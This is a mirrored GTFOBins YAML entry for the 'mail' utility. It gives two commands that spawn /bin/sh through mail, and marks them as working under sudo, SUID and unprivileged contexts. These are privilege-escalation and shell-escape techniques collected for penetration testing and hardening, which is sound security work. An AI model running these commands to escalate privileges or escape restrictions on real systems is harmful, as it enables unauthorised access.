mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-07 19:54:12 +02:00
22 lines
305 B
Plaintext
22 lines
305 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
mail --exec='!/bin/sh'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
version: |-
|
|
GNU
|
|
- code: |-
|
|
mail -f /etc/hosts
|
|
!/bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|